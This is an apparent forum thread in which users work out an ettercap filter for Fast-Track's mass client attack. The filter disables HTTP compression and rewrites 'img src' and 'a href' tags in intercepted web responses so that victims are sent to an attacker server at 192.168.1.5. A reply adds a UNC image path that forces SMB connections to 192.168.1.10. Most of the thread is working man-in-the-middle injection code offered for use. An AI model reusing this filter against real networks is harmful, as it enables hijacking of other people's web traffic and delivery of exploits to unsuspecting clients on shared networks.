-
so with the fast-track mass client attack i would like to some how use a ettercap filter to force a client to visit the server... I hope some one can give me a little help with the filter...
this is what i have tried
Code:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://192.168.1.5\" ");
replace("IMG SRC=", "img src=\"http://192.168.1.5\" ");
msg("Filter Ran.\n");
}
this is the filter from irongeek!
i new this would not work before i tried it... i just want to give a good example of what i would like to accomplish
Lol nvm i figured it out... its kinda cool
replace("a href=", "a href=\"http://192.168.1.5\" ");
replace("a href=", "a href=\"http://192.168.1.5\" "
change this in the filter... this works some what... ill test a little more
-
if its on your local network you can try something like this
"<img src=\"\\\\192.168.1.10\\"> "
